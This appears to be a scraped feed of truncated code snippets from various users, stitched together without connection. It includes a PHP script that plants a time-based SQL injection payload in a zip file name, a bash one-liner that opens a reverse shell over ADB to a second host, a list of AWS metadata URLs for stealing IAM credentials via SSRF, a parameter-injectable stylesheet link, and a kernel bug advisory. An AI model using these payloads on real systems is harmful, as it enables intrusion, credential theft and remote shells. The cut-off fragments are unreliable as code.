mcipekci

<?php
// Prepare File
$file = tempnam("/tmp", "zip");
$zip = new ZipArchive();
$zip->open($file, ZipArchive::OVERWRITE);
// Add file name with SQLi payload
$zip->addFromString("'+(CASE WHEN 1=".$_GET['value']." THEN 1 ELSE sleep(10) END)+'", "");
// Close and send to the server
$zip->close();
$cf = new CURLFile($file);

0x36

#if 0
Reported : 19-Jan-2020
Fixed in iOS 13.4 with CVE-2020-9768
AppleJPEGDriverUserClient : mach port use-after-free/type-confusion via race condition 

AppleJPEGDriverUserClient external methods can be used synchronously or asynchronously, when used asynchronously, 
it brings the registered mach port (via registerNotificationPort()) and put it inside jpegRequest data structure,
and no reference count was taken for this operation. since registerNotificationPort() is not gated, it is 
possible to release the port (if the port got substituted)  during the processing of jpeg request and end up
with dangling pointer passed to _mach_msg_send_from_kernel_proper().

numanturle

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Title of the document</title>
<link href="<?php echo (isset($_GET['css'])?htmlspecialchars($_GET['css']):null); ?>" rel="stylesheet">
</head>
<body>
Content of the document......
</body>

nuryslyrt

## AWS 
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

random-robbie

#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie 
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"

random-robbie

#!/bin/bash
chromium-browser --headless --disable-gpu  --window-size=1920,1080 --screenshot http://$1 --screenshot=$RANDOM.jpg >/dev/null 2>&1
echo "[*] Screenshot Taken of http://$1 [*]"

random-robbie

https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c

https://www.cidrcalculator.com/asn/asn-to-prefix.html?lang=en

https://itnext.io/aks-kubernetes-security-walk-through-challenge-2-dbe3ed16beec

https://www.digitalinterruption.com/single-post/2018/06/04/Are-Your-Cookies-Telling-Your-Fortune

https://blog.innerht.ml/

aricih

// ==UserScript==
// @name         Colorized Slack
// @namespace    https://www.netsparker.com/
// @version      1.4.1
// @description  Colorizes the message threads.
// @author       Hakan Arıcı
// @include        *.slack.com*
// ==/UserScript==

(function() {

r6m

package main

import(
	"fmt"
	"reflect"
)

func main() {
	items := []int{1,2,3,4,5,6}
	fmt.Println(SliceExists(items, 5)) // returns true

taviso

// Open direct messages window, paste this into console.
function deleteNextConversation()
{
    if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
        clearInterval(tmr)
        return;
    }

    dm.firstChild.click();
    setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);